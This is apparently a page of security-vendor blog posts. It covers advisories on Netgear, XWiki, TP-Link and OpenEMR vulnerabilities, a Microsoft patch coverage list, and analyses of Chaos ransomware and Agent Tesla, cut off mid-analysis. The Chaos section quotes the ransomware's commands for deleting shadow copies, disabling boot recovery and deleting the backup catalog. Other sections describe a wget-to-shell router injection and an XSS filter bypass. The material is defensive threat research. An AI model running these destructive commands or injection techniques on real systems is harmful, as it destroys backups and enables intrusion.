Posts

Netgear ProSAFE NMS300 SQLi Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Netgear ProSAFE Network Management System (NMS300) is a centralized and comprehensive management application designed for network administrators. It enables them to discover, monitor, configure, and report on SNMP-based enterprise-class network devices. The Netgear Network Management System NMS300 provides insights into network elements, including third-party devices, and its web-based user interface simplifies the process of monitoring and administering an entire network.

  An SQL injection vulnerability has been reported in Netgear ProSafe NMS300. This vulnerability arises due to improper input validation in the getNodesByTopologyMapSearch component.

  A remote, authenticated attacker could exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation of this vulnerability could result in SQL injection or, in the worst-case scenario, remote code execution in the context of the SYSTEM user.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-38099.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  When a user navigates to the device list through the topology map search feature, an HTTP GET request is dispatched to the Request-URI “/topology.do?method=getDeviceListByDim”. Upon receipt of this request, the function TopologyMapController.getDeviceByDim() is invoked. This function displays the values of all devices identified in the preceding search request. Multiple parameter values are saved into different variables, with the ‘exclude’ parameter being of particular relevance to this vulnerability. The value for the ‘exclude’ parameter is stored in the ‘exclude’ variable.

  Following this, the NodeInfoDao.getNodesTopologyMapSearch() method is invoked, passing the ‘exclude’ variable’s value into the ‘equips’ variable. This function is responsible for constructing and running the SQL query needed to fetch the specified device list. The corresponding SQL query is stored as a string in the ‘sql’ variable:
  
  If the ‘equips’ variable’s value is not empty, the string ” and nodeId not in (equips) ” is appended to the ‘sql’ variable’s value (where equips is replaced by the ‘equips’ variable’s value). The SQL query contained in the ‘sql’ variable is then executed, and the result of the query is returned.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the vulnerable software.
  • The attacker must have permission to view the device list via the Topology map search component.

Triggering Conditions:

  The vulnerability is triggered when the HTTP request is received that includes an embedded SQL injection which will get triggered when the request is processed.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
  What a successful GET Request might look like:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 4001 NETGEAR ProSAFE NMS300 SQL Injection

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

A new variant from Chaos Ransomware family surfaces

/in /by

The SonicWall Capture Labs Research team has received a sample of a new variant from Chaos Ransomware family which is a customizable ransomware builder that emerged in underground forums, by falsely marketing itself as the .NET version of Ryuk.

It provided the following customizable options which a cybercriminal can use to customize a ransomware.

  • processName = “svchost.exe”;
  • sleepTextbox = 10;
  • spreadName = “surprise.exe”;
  • userDir = “C:\\Users\\”;
  • checkAdminPrivilage = true;
  • checkCopyRoaming = true;
  • checkdeleteBackupCatalog = true;
  • checkdeleteShadowCopies = true;
  • checkdisableRecoveryMode = true;
  • checkSleep = false;
  • checkSpread = true;
  • checkStartupFolder = true;
  • droppedMessageTextbox = “read_it.txt”;
  • encryptedFileExtension = “”;
  • encryptionAesRsa = true;
  • messages = new string[]; #Ransomware message content

Infection Cycle:

At the start of the execution it checks its own filename and the location from where it is running.

If the process name and the location name is not %appdata%\\svchost.exe, it drops a copy of itself to %appdata%\\svchost.exe and launches it.

After that it checks for the “checkSleep” variable which is provided at the time of building ransomware, if the value is False is will skip executing the sleepOutOfTempFolder(), function which also checks the folder location form where it is running and if the path does not matches, it uses another count variable “sleepTextbox” whose value is multiplied by 1000 times and resulting value is passed to thread and sleeps for that many milliseconds.

It then checks for the checkStartupFolder flag and if its true it calls addLinkToStartup() function.

It creates a file svchost.url in which it adds the location of the file and copy the file into User Startup folder to
enable its automatic execution at every system startup

It has a hardcoded list of directories and files with valid extension in those directories are only encrypted.

List of the extension

Before encrypting the file it checks for the list of valid file extensions and the filename should not be one in the droppedMessageTextbox supplied at the time of building the ransomware.

This droppedMessageTextbox contains the name of the file which contains the ransomware message.
In our case the filename is “read_it.txt”;

Before encrypting the file it checks for the File length.
If the file length is below 2,117,152 bytes, it encrypts the file using EncryptFile method and if the size is bigger than
2,117,152 bytes a random string of a random length between 200000000 and 300000000 bytes is generated and encoded using the randomEncode method.

It creates a 20 byte random password and converts the password to a byte array using UTF8 encoding.
The content of the file is then AES encrypted using that key.
It then encrypts the key generated earlier using the RSA encryption

AES encrypted content are again converted into Base64 encoding.

It then concat the RSAEncrypted key and base64 encoded content into the file using File.WriteAllText method.

Finally, original file is moved to same location by appending a random extension using the RandomStringForExtension method.
It then drops the “read_it.txt” containing the ransomware message on that location.

Once the encryption is done it delete Shadow Copies, disable Recovery Mode and delete Backup Catalog file using below commands.

“vssadmin delete shadows /all /quiet & wmic shadowcopy delete”
“bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no”
“wbadmin delete catalog -quiet”

In order or spread, it loops through all the available drives on the system and if the drive is not a C:\ drive and the spreadName file is not present on the system, It copies the malware’s file to that drive with the specified spreadName.

This way the malware can potentially infect other machines whose drives are mapped onto the victim’s machine.

Once the encryption is completed it displays the ransomware message text.

It set the below wallpaper

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV:MalAgent.RSM_99 (Ransomware)

XWiki RCE Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  XWiki is recognized as a second-generation wiki platform, bringing together the conventional wiki functionality and the unique potential of an application development platform. It showcases a broad array of features typical of a wiki, such as advanced access rights and effective user management. Additionally, XWiki’s defining trait lies in its capacity to allow the creation of new applications, which can be developed directly on top of the platform.

  Recently, a significant issue has emerged pertaining to XWiki, specifically a reported vulnerability that allows remote code execution. This vulnerability stems from improper handling of documentTree macro parameters within the system. The improper escaping of these parameters creates a security gap, making the platform susceptible to external threats.

  The security flaw opens up an opportunity for remote attackers to exploit this vulnerability. They can do so by sending specially crafted requests to the target server, where XWiki is being hosted. Should the attack be successful, the exploiter would gain the ability to execute code remotely.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-29509.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  XWiki boasts a powerful scripting feature set, allowing users to create everything from simple to intricate web applications on an XWiki page (or view) layer. There is no need for users to compile code or deploy software components – instead, they can utilize scripting syntax alongside wiki markup directly within the content of an XWiki page.

  The platform supports a range of scripting languages, including Velocity, Groovy, and Python, all of which are enabled by default. XWiki incorporates the JSR-223 scripting platform, which facilitates the evaluation of script code. Additionally, XWiki utilizes a script macro that assesses script code and is structured as follows:

  

  To declare script code for default enabled languages, users can directly use the language name:

  

  The standard XWiki flavor includes the “Flamingo Theme Application” extension. This allows users to customize site skins, and the extension has a macro “FlamingoThemesCode.WebHome”. This macro lists the sub-documents of any given document. When a page request is made with the GET parameter sheet set to “FlamingoThemesCode.WebHome”, the same macro is used to render the page. The parameter document:$doc.documentReference is set to the current page, and this value is passed to the documentTree macro, which in turn lists the sub-documents of the present page.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker requests a malicious page using the FlamingoThemesCode.WebHome view. The vulnerability is triggered when the server processes the requests.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

  Get Request:
  
  URL Decoded:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2062 XWiki Commons documentTree Remote Code Execution 1
  • IPS: 18914 XWiki Commons documentTree Remote Code Execution 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

TP-Link Archer Command Injection Vulnerability

/in /by

TP-Link is a company that specializes in manufacturing and selling networking products, including routers, switches, Wi-Fi range extenders, powerline adapters, access points, network adapters, and smart home devices. They provide reliable and affordable networking solutions for both home and business use.
The TP-Link Archer AX21 is a Wi-Fi 6 Dual-Band wireless router designed to deliver high-speed and reliable wireless connectivity for home networks.

TP-Link Archer AX21 Command Injection | CVE-2023-1389
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contain a command injection vulnerability in the web management interface.
The issue resides in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Due to inadequate sanitization of the country parameter in a write operation, an unauthenticated attacker could exploit the flaw using a simple POST request. By injecting malicious commands, the attacker could execute them as the root user, potentially gaining unauthorized access and control over the router.
The CVSS (Common Vulnerability Scoring System) score is 8.8 with CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack vector is Adjacent.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

As seen in the above exploit the vulnerable country parameter is used to download malicious content from the URL using the ‘wget’ command. The vertical bar | is used for piping the output of one command to another. In this case, the output of the previous ‘wget’ command is being piped to the ‘sh’ command, which stands for the shell. This means that the downloaded content is being passed directly to the shell for execution. The attacker could execute the command as a root user and take over the router .

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864:TP-Link Archer AX21 Command Injection

TP-Link has released firmware version 1.1.4 Build 20230219 which fixes this vulnerability.

Threat Graph

Microsoft Security Bulletin Coverage for July 2023

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-32046 Windows MSHTML Platform Elevation of Privilege Vulnerability
IPS 19225: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 1
IPS 19226: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 2

CVE-2023-33134 Microsoft SharePoint Server Remote Code Execution Vulnerability
IPS 3941 : Microsoft SharePoint Server Remote Code Execution (CVE-2023-33134)

CVE-2023-33157 Microsoft SharePoint Remote Code Execution Vulnerability
IPS 3943 : Microsoft SharePoint Remote Code Execution (CVE-2023-33157)

CVE-2023-35311 Microsoft Outlook Security Feature Bypass Vulnerability
ASPY 461 : Exploit-exe exe.MP_330

CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability
ASPY 462 : Exploit-exe exe.MP_331

CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability
ASPY 463 : Malformed-rtf rtf.MP_34

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21526 Windows Netlogon Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21756 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29347 Windows Admin Center Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32033 Microsoft Failover Cluster Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32034 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32035 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32037 Windows Layer-2 Bridge Network Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32038 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32039 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32040 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32041 Windows Update Orchestrator Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32042 OLE Automation Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32043 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32044 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32045 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32047 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32049 Windows SmartScreen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32050 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32051 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32052 Microsoft Power Apps Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32053 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32054 Volume Shadow Copy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32055 Active Template Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32056 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32057 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32083 Microsoft Failover Cluster Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32084 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32085 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33127 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33148 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33149 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33150 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33151 Microsoft Outlook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33152 Microsoft ActiveX Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33153 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33154 Windows Partition Management Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33155 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33156 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33158 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33159 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33160 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33161 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33162 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33163 Windows Network Load Balancing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33164 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33165 Microsoft SharePoint Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33166 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33167 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33168 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33169 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33170 ASP.NET and Visual Studio Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33171 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-33172 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33173 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33174 Windows Cryptographic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35296 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35297 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35298 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35299 Windows Common Log File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35300 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35302 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35303 USB Audio Class System Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35304 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35305 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35306 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35308 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35309 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35310 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35312 Microsoft VOLSNAP.SYS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35313 Windows Online Certificate Status Protocol (OCSP) SnapIn Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35314 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35315 Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35316 Remote Procedure Call Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35317 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35318 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35319 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35320 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35321 Windows Deployment Services Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35322 Windows Deployment Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35323 Windows OLE Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35324 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35325 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35326 Windows CDP User Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35328 Windows Transaction Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35329 Windows Authentication Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35330 Windows Extended Negotiation Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35331 Windows Local Security Authority (LSA) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35332 Windows Remote Desktop Protocol Security Feature Bypass
There are no known exploits in the wild.
CVE-2023-35333 MediaWiki PandocUpload Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35335 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-35336 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35337 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35338 Windows Peer Name Resolution Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35339 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35340 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35341 Microsoft DirectMusic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35342 Windows Image Acquisition Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35343 Windows Geolocation Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35344 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35345 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35346 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35347 Microsoft Store Install Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35348 Active Directory Federation Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35350 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35351 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35352 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35353 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35356 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35357 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35358 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35360 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35361 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35362 Windows Clip Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35363 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35364 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35365 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35366 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35367 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35373 Mono Authenticode Validation Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-35374 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36867 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36868 Azure Service Fabric on Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36871 Azure Active Directory Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-36872 VP9 Video Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.

OpenEMR Reflected XSS Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenEMR is a comprehensive open-source electronic health records (EHR) and medical practice management application. It provides an array of functionalities aimed at enhancing the efficiency of medical practice management. Among the critical features it provides are patient statistics, medical billing, electronic medical record (EMR) generation, and appointment scheduling. The listed capabilities empower medical practitioners, clinics, and hospitals to effectively manage and coordinate patient schedules, maintain detailed patient records, and streamline the billing process electronically. OpenEMR is designed with a flexible, user-friendly interface, making it an accessible solution for healthcare providers aiming to digitize and optimize their administrative and patient care processes. As an open-source platform, it also affords the flexibility of customization according to individual or institutional needs, further enhancing its applicability across a broad range of healthcare settings.

  A reflected cross-site scripting vulnerability has been identified in OpenEMR. This vulnerability arises from inadequate input validation associated with the ‘list_id’ parameter in ‘share_template.php’.

  A remote attacker could exploit this vulnerability by enticing a victim to open a crafted URL. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim’s browser.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2948.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability stems from inadequate validation of the “list_id” parameter in the “share_template.php” file. When a request is submitted to the RequestURI at “library/custom_template/share_template.php”, it leads to the generation of HTML content by “share_template.php”. This content also encompasses some JavaScript code. Within the context of this generated JavaScript code, the value of the “list_id” parameter is manifested in the definition of a function called “add_template()”, as illustrated below:
  
  where $list_id is sanitized first by using PHP htmlspecialchars() function.

  However, the use of htmlspecialchars() for XSS sanitization in this case is ineffective, as it only escapes the characters “<", ">“, and single and double quotes. An attacker can bypass this limitation by sending malicious JavaScript code that excludes these specific characters in the “list_id” request parameter and delivering the request to the “share_template.php” endpoint. With a specially tailored “list_id” value, the attacker can interfere with the original “add_template()” function definition and append their own JavaScript code immediately after it. For instance, consider a situation where the “list_id” parameter contains a skillfully crafted value like the one below:
  
  Then “share_template.php” will generate the JavaScript code HTML format as below:
  
  In this scenario, the crafted value allows the original “add_template()” function definition to be escaped and a script command – “alert(55555)” – to be inserted right after the function’s conclusion. Consequently, the “alert(55555)” will execute when the server-returned HTML content is loaded in the user’s browser. If the “alert(55555)” were to be swapped with a different malicious script, it would lead to the execution of this harmful code in the browser, potentially triggering XSS opportunities.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.
  • The attacker must be able to deliver a malicious URL to a target user.

Triggering Conditions:

  A user is lured by an attacker into opening a URL that contains a carefully designed list_id parameter. The vulnerability manifests itself when the user initiates the URL in a web browser.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 19216 OpenEMR Cross-Site Scripting

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following patch to address this issue:
  Vendor Advisory

Agent Tesla RAT Disguised As NSIS Installer

/in /by

Overview

The SonicWall Capture Labs Research team recently observed an Agent Tesla malware that is being loaded using Native Loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed using Microsoft .Net framework capable of stealing sensitive information. It has been one of the most prevalent malware families from the past couple of years.

In this blog post, we will discuss.

  • Capabilities of Agent Tesla with complete catalog of targeted software.
  • Understanding how Native Loader is used to load Agent Tesla.
  • Evolution of Agent Tesla’s String Decryption Algorithm.
  • Approach for Automatic String Decryption.

Introduction

Agent Tesla malware first appeared in 2014 has been active for over last nine years and it is constantly being updated by its threat actor by adding new capabilities. Agent tesla’s main objective consists of credential stealing, keylogging, screen capture, clipboard capture, stealing victims’ application data and send it to threat actor.

Infection Cycle

Agent Tesla is mainly delivered though phishing emails.

Fig 1. Infection Cycle

Unpacking of AgentTesla

Recent variant of Agent Tesla is being distributed as NSIS Installer consisting of NSIS script, DLL plugin and encrypted payload’s file.

Fig 2. Extracted Files of NSIS installer

Layer 1 – Plugin DLL

NSIS-plugin DLL calls its the exported function “HvDeclY” which decrypts the layer 2 shellcode.

Layer 2 – Shellcode

API HASHING

Shellcode uses API Hashing to obfuscate API calls.

Fig 3. Custom API Hashing Algorithm

ANTI-EMULATION

Shellcode crash itself by jumping to invalid address when dwNumberOfProcessors < 1 or VirtualAllocExNuma API not able to allocates memory.

Shellcode has an Anti-Emulation check – It allocates the 381 MB of memory space, set each byte to 0 and free that memory space.

On 64-bit system, Shellcode uses heaven’s gate technique to avoid analysis by debugger.

Fig 4. Heaven’s Gate call

PROCESS HOLLOWING

